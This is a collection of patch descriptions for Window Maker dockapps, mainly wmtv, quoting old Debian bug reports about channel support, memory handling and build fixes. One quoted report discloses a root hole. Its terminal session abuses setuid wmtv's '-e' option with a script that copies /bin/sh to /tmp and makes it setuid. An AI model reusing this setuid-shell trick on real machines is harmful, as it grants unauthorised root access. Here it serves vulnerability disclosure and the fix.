Patch by Nicolas Boullis <Boullis.Nicolas@libertysurf.fr>. From [1]:
From: Nicolas Boullis <Boullis.Nicolas@libertysurf.fr>
Subject: wmtv: some french channels are not available
Date: Fri, 16 Nov 2001 01:33:13 +0100
wmtv does not currently support a few channels which are used in France.
These channels are called K01-K10, KB-KQ and H01-H19.
The patch included defines a new "freqnorm" called "secam-france", and
the new channels.
[1] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=119767
Patch by Nicolas Boullis <Boullis.Nicolas@libertysurf.fr>. From [1]:
From: Nicolas Boullis <Boullis.Nicolas@libertysurf.fr>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: wmtv: dangerous suid root
Date: Thu, 08 Nov 2001 20:07:52 +0100
Hi !
I think there is a huge security hole with wmtv and, when wmtv is installed,
anyone can easily get a root account. Here is what I have in my terminal:
(everytime I launch wmtv, I double-clicked in the tv subwindow to call the
external program)
----------------------------------------------------------------------
Tintin:~> wmtv -e whoami
root
Tintin:~> cat > crack_root.sh
#!/bin/sh
cp /bin/sh /tmp
chmod u+s /tmp/sh
Tintin:~> chmod +x crack_root.sh
Tintin:~> wmtv -e ~/crack_root.sh
Tintin:~> ll /tmp/sh
-rwsr-xr-x 1 root users 407356 Nov 8 19:25 /tmp/sh*
----------------------------------------------------------------------
I tried to make wmtv non-suid root, and... sometimes it works (despite an
error message), sometimes it does not...
----------------------------------------------------------------------
Tintin:~> ll /usr/bin/X11/wmtv
-rwxr-xr-x 1 root root 62588 Jul 31 01:55 /usr/bin/X11/wmtv*
Tintin:~> wmtv
ioctl VIDIOCSFBUF: Operation not permitted
Tintin:~> wmtv
ioctl VIDIOCSFBUF: Operation not permitted
wmtv: no physical frame buffer access
----------------------------------------------------------------------
Hence, I guess you should either correct wmtv so that it always work without
being suid root, or make wmtv lose its privileges before it runs an external
program.
[1] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=118778
Patch by Yann Vernier <yann@donkey.dyndns.org>. From [1]:
From: Malcolm Parsons <malcolm@ivywell.screaming.net>
Subject: wmtv: incorrectly calculates bytes per line
Date: Mon, 09 Apr 2001 21:15:52 +0100
wmtv does not put the tv display in its window on my second head.
According to bttv, wmtv is telling bttv that the display is:
Display at ea800000 is 800 by 600, bytedepth 2, bpl 1600
If I use xawtv, it correctly sets the bpl value:
Display at ea800000 is 800 by 600, bytedepth 2, bpl 1664
wmtv is probably incorrectly assuming width * bytedepth = bpl.
From: Yann Vernier <yann@donkey.dyndns.org>
Subject: wmtv: incorrectly calculates bytes per line
Date: Sun, 15 Jul 2001 14:21:56 +0200
Found the problem, at least this fixes it for me at 1600x1200.
[1] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=93439
Patch by Yann Vernier <yann@algonet.se>. From [1]:
wmtv failed to read my .wmtvrc (hand written) correctly, I tracked it
down to incorrect memory management (sizeof() instead of strlen()).
The code was so bad that I chose to rewrite it to a simpler version,
patch below.
Other bugs fixed include some of the memory leaks (which are quite
numerous) and truncating the .wmtvrc when writing to it.
Cosmetic changes include keeping comments in .wmtvrc, C++-style
comments changed to C style, and numbering channels from 1.
[1] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=105325
This fixes the package-contains-timestamped-gzip warning given by Lintian
for the Debian package. (This warning is really unnecessary, as its purpose
it to check for reproducible builds and the fonts are not compressed at
build time, but I see no harm in removing these timestamps.)
In the README it is said to run ./configure but there's no such script in the
tarball. I wrote instructions to generate a ./configure with libtool and autotools.
- More logical relationship between volume level and bar length
- No unnecessary drawing
- Volume bar shrinks properly even when volume is lowered very quickly
Otherwise, we get the following warning during build.
wmload.c: In function ‘GetLoad’:
wmload.c:523:10: warning: incompatible implicit declaration of built-in function ‘rint’
*usr = rint(Maximum * (float)(*usr) /total);
^
Obtained from the Debian package [1].
[1] https://sources.debian.net/src/wmload/0.9.6-1/debian/patches/bump_POSIX_C_SOURCE.patch/